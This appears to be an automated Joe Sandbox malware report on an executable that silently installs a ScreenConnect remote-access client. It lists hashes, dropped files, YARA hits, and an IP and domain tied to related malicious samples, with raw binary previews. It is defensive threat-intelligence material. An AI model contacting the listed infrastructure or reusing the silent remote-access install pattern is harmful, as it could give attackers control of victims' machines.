                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Sample name:f53WqfzzNt.exe
                                                                                                              renamed because original name is a hash value
                                                                                                              Original Sample Name:5fe1ed17626c02fd6b85cc7e02d20e7f68271ca1dff97855785cf58b9b0d0e57.exe
                                                                                                              Detection:MAL
                                                                                                              Classification:mal46.evad.winEXE@18/59@1/2
                                                                                                              EGA Information:
                                                                                                              • Successful, ratio: 60%
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 65%
                                                                                                              • Number of executed functions: 187
                                                                                                              • Number of non-executed functions: 0
                                                                                                              Cookbook Comments:
                                                                                                              • Found application associated with file extension: .exe
                                                                                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                              • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                                                              Warnings

                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                              • Excluded IPs from analysis (whitelisted): 23.218.208.109
                                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                                              • Execution Graph export aborted for target f53WqfzzNt.exe, PID 7480 because it is empty
                                                                                                              • Execution Graph export aborted for target rundll32.exe, PID 7680 because it is empty
                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                              • VT rate limit hit for: f53WqfzzNt.exe

                                                                                                              Simulations

                                                                                                              Behavior and APIs

                                                                                                              No simulations

                                                                                                              Joe Sandbox View / Context

                                                                                                              IPs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              38.69.12.167tiG6Ep202n.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                6IqUjK9Koj.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                  tiG6Ep202n.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                    6IqUjK9Koj.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                      hB52OUUCE2.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                        lCwus2wfk6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                          pbenHWj8JO.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                            1g6DULljd2.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                              2nmtr41l0S.exeGet hashmaliciousScreenConnect ToolBrowse

                                                                                                                                Domains

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                sc.connectprotocol.estiG6Ep202n.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                • 38.69.12.167
                                                                                                                                6IqUjK9Koj.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                • 38.69.12.167
                                                                                                                                tiG6Ep202n.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                • 38.69.12.167
                                                                                                                                6IqUjK9Koj.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                • 38.69.12.167
                                                                                                                                hB52OUUCE2.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                • 38.69.12.167
                                                                                                                                lCwus2wfk6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                • 38.69.12.167
                                                                                                                                pbenHWj8JO.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                • 38.69.12.167
                                                                                                                                1g6DULljd2.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                • 38.69.12.167
                                                                                                                                2nmtr41l0S.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                • 38.69.12.167

                                                                                                                                ASNs

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                54583UStiG6Ep202n.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                • 38.69.12.167
                                                                                                                                6IqUjK9Koj.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                • 38.69.12.167
                                                                                                                                tiG6Ep202n.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                • 38.69.12.167
                                                                                                                                6IqUjK9Koj.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                • 38.69.12.167
                                                                                                                                hB52OUUCE2.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                • 38.69.12.167
                                                                                                                                lCwus2wfk6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                • 38.69.12.167
                                                                                                                                pbenHWj8JO.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                • 38.69.12.167
                                                                                                                                1g6DULljd2.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                • 38.69.12.167
                                                                                                                                2nmtr41l0S.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                • 38.69.12.167

                                                                                                                                JA3 Fingerprints

                                                                                                                                No context

                                                                                                                                Dropped Files

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dlltiG6Ep202n.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                  6IqUjK9Koj.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                    tiG6Ep202n.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                      6IqUjK9Koj.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                        hB52OUUCE2.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                          lCwus2wfk6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                            pbenHWj8JO.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                              VVs9SAqm5N.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                1g6DULljd2.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                  C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dlltiG6Ep202n.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                    6IqUjK9Koj.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                      tiG6Ep202n.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                        6IqUjK9Koj.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                          hB52OUUCE2.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                            lCwus2wfk6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                              pbenHWj8JO.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                VVs9SAqm5N.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                  1g6DULljd2.exeGet hashmaliciousScreenConnect ToolBrowse

                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                    C:\Config.Msi\4ec960.rbs

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):219559
                                                                                                                                                                    Entropy (8bit):6.582340024712406
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:EW9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMGW:EWuH2aCGw1ST1wQLdqvW
                                                                                                                                                                    MD5:EE0CAA10D824D53BF05C55219F06F351
                                                                                                                                                                    SHA1:00750DFF09CA2BFFE85AABA2EE71EDE909553713
                                                                                                                                                                    SHA-256:67DB5C077B813AE0419AFF16CA89F3899260970E73794974CEE9DF2B16CCC0E7
                                                                                                                                                                    SHA-512:4BF8E1DFD65AB94DE6FAC5C86A0386FE4B629F523C4A22A50AC480BAA84C2745D103486FB5F808A63E0860C370E8D70B7A1C9661B8F8CF04B48A9A1496A45191
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\4ec960.rbs, Author: Joe Security
                                                                                                                                                                    Preview:...@IXOS.@.....@.R.Y.@.....@.....@.....@.....@.....@......&.{14C6E684-39F9-9C17-EDF7-878C827CA860}'.ScreenConnect Client (a532d472f1ff1d4e)..ScreenConnect.ClientSetup.msi.@.....@.....@.....@......DefaultIcon..&.{14C6E684-39F9-9C17-EDF7-878C827CA860}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (a532d472f1ff1d4e)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{CF9AE42D-A542-A5BE-DF54-2B1FF488B5E3}&.{14C6E684-39F9-9C17-EDF7-878C827CA860}.@......&.{9509AE8A-E997-4132-8CAB-BAFE89DF77F6}&.{14C6E684-39F9-9C17-EDF7-878C827CA860}.@......&.{8B377FBF-DB9A-CC34-86C5-7376F38045E2}&.{14C6E684-39F9-9C17-EDF7-878C827CA860}.@......&.{323CD391-BE8F-8C69-EEBD-0C2E11594F31}&.{14C6E684-39F9-9C17-EDF7-878C827CA860}.@......&.{992F76AD-4404-BDC8-9819-6B28811D5620}&.{14C6E684-39F9-9C17-EDF7-878C827CA860}.@......&.{63515BD8-20DD-F293-D546-00656A7D96D3}&.{14C6E684-39F9-9C17-EDF7

                                                                                                                                                                    C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\Client.Override.en-US.resources

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):444
                                                                                                                                                                    Entropy (8bit):4.5254339848602845
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:rHy2DLI4MWo9E5SL9cAIUPDLk6N7A7K3UMZRCl1jBlka:zHE4bSBxIU7TE7KtZRKBlka
                                                                                                                                                                    MD5:9B38D6900AA7DEA328BAEC4CA308737F
                                                                                                                                                                    SHA1:93960A7381926A250F5B2A800A2FB89E0A188BE7
                                                                                                                                                                    SHA-256:9D67E0E35D8DAD9B0AE368E607E134B755C3EB4BE2CE0A65578FEAE78116C794
                                                                                                                                                                    SHA-512:0DA66F8595ACEDF8465FFE9F825A5CA39E888F8C66AC17D83D091BB6D292352A3357BA09897CDF52439F61C1F2FDC0FB207E065C8D57928307DFB537D337321E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP=c!.@To..2...n_\.......%........... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....2B.l.a.n.k.M.o.n.i.t.o.r.M.e.s.s.a.g.e.F.o.r.m.a.t.....>H.i.d.d.e.n.A.p.p.B.a.l.l.o.o.n.T.e.x.t.T.i.t.l.e.F.o.r.m.a.t.....8U.n.d.e.r.C.o.n.t.r.o.l.B.a.n.n.e.r.T.e.x.t.F.o.r.m.a.t.......File......

                                                                                                                                                                    C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\Client.en-US.resources

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):50133
                                                                                                                                                                    Entropy (8bit):4.759054454534641
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                                                                                                    MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                                                                                                    SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                                                                                                    SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                                                                                                    SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...

                                                                                                                                                                    C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\Client.resources

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):26722
                                                                                                                                                                    Entropy (8bit):7.7401940386372345
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                                                                                                    MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                                                                                    SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                                                                                    SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                                                                                    SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.

                                                                                                                                                                    C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):197120
                                                                                                                                                                    Entropy (8bit):6.586775768189165
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:/xLtNGTlIyS7/ObjusqVFJRJcyzvYqSmzDvJXYF:FtNGTGySabqPJYbqSmG
                                                                                                                                                                    MD5:3724F06F3422F4E42B41E23ACB39B152
                                                                                                                                                                    SHA1:1220987627782D3C3397D4ABF01AC3777999E01C
                                                                                                                                                                    SHA-256:EA0A545F40FF491D02172228C1A39AE68344C4340A6094486A47BE746952E64F
                                                                                                                                                                    SHA-512:509D9A32179A700AD76471B4CD094B8EB6D5D4AE7AD15B20FD76C482ED6D68F44693FC36BCB3999DA9346AE9E43375CD8FE02B61EDEABE4E78C4E2E44BF71D42
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                    • Filename: tiG6Ep202n.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: 6IqUjK9Koj.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: tiG6Ep202n.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: 6IqUjK9Koj.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: hB52OUUCE2.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: lCwus2wfk6.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: pbenHWj8JO.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: VVs9SAqm5N.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: 1g6DULljd2.exe, Detection: malicious, Browse
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.................. ... ....... .......................`......#.....@.................................A...O.... ..|....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...|.... ......................@..@.reloc.......@......................@..B................u.......H...........4............_...... .........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..

                                                                                                                                                                    C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):68096
                                                                                                                                                                    Entropy (8bit):6.06942231395039
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:+A0ZscQ5V6TsQqoSD6h6+39QFVIl1zJhb8gq:p0Zy3gUOQFVQzJq
                                                                                                                                                                    MD5:5DB908C12D6E768081BCED0E165E36F8
                                                                                                                                                                    SHA1:F2D3160F15CFD0989091249A61132A369E44DEA4
                                                                                                                                                                    SHA-256:FD5818DCDF5FC76316B8F7F96630EC66BB1CB5B5A8127CF300E5842F2C74FFCA
                                                                                                                                                                    SHA-512:8400486CADB7C07C08338D8876BC14083B6F7DE8A8237F4FE866F4659139ACC0B587EB89289D281106E5BAF70187B3B5E86502A2E340113258F03994D959328D
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                    • Filename: tiG6Ep202n.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: 6IqUjK9Koj.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: tiG6Ep202n.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: 6IqUjK9Koj.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: hB52OUUCE2.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: lCwus2wfk6.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: pbenHWj8JO.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: VVs9SAqm5N.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: 1g6DULljd2.exe, Detection: malicious, Browse
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...nu............" ..0.............. ... ...@....... ..............................p.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........

                                                                                                                                                                    C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):95512
                                                                                                                                                                    Entropy (8bit):6.504684691533346
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:Eg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkggU0HMx790K:dhbNDxZGXfdHrX7rAc6myJkggU0HqB
                                                                                                                                                                    MD5:75B21D04C69128A7230A0998086B61AA
                                                                                                                                                                    SHA1:244BD68A722CFE41D1F515F5E40C3742BE2B3D1D
                                                                                                                                                                    SHA-256:F1B5C000794F046259121C63ED37F9EFF0CFE1258588ECA6FD85E16D3922767E
                                                                                                                                                                    SHA-512:8D51B2CD5F21C211EB8FEA4B69DC9F91DFFA7BB004D9780C701DE35EAC616E02CA30EF3882D73412F7EAB1211C5AA908338F3FA10FDF05B110F62B8ECD9D24C2
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................>)....@.................................p...x....`..P............L...)...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Core.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):548864
                                                                                                                                                                    Entropy (8bit):6.034211651049746
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:xC2YKhQCNc6kVTplfWL/YTHUYCBdySISYz:HhE6O7WL/EC
                                                                                                                                                                    MD5:14E7489FFEBBB5A2EA500F796D881AD9
                                                                                                                                                                    SHA1:0323EE0E1FAA4AA0E33FB6C6147290AA71637EBD
                                                                                                                                                                    SHA-256:A2E9752DE49D18E885CBD61B29905983D44B4BC0379A244BFABDAA3188C01F0A
                                                                                                                                                                    SHA-512:2110113240B7D803D8271139E0A2439DBC86AE8719ECD8B132BBDA2520F22DC3F169598C8E966AC9C0A40E617219CB8FE8AAC674904F6A1AE92D4AC1E20627CD
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............." ..0..X...........s... ........... ..............................].....@.................................as..O.......t............................r..8............................................ ............... ..H............text....W... ...X.................. ..`.rsrc...t............Z..............@..@.reloc...............^..............@..B.................s......H........C..,/..................Dr........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.

                                                                                                                                                                    C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Windows.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1721856
                                                                                                                                                                    Entropy (8bit):6.639085961200334
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:dx5xeYkYFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:dx5xTkYJkGYYpT0+TFiH7efP
                                                                                                                                                                    MD5:9AD3964BA3AD24C42C567E47F88C82B2
                                                                                                                                                                    SHA1:6B4B581FC4E3ECB91B24EC601DAA0594106BCC5D
                                                                                                                                                                    SHA-256:84A09ED81AFC5FF9A17F81763C044C82A2D9E26F852DE528112153EE9AB041D0
                                                                                                                                                                    SHA-512:CE557A89C0FE6DE59046116C1E262A36BBC3D561A91E44DCDA022BEF72CB75742C8B01BEDCC5B9B999E07D8DE1F94C665DD85D277E981B27B6BFEBEAF9E58097
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y............." ..0..>..........~]... ...`....... ..............................8.....@.................................+]..O....`..|............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc...|....`.......@..............@..@.reloc...............D..............@..B................_]......H.......t...d..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...

                                                                                                                                                                    C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsAuthenticationPackage.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):260168
                                                                                                                                                                    Entropy (8bit):6.416438906122177
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:qJvChyA4m2zNGvxDd6Q6dtaVNVrlaHpFahvJ9ERnWtMG8Ff2lt9Bgcld5aaYxg:0IvxDdL6d8VNdlC3g0RCXh5D
                                                                                                                                                                    MD5:5ADCB5AE1A1690BE69FD22BDF3C2DB60
                                                                                                                                                                    SHA1:09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
                                                                                                                                                                    SHA-256:A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
                                                                                                                                                                    SHA-512:812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
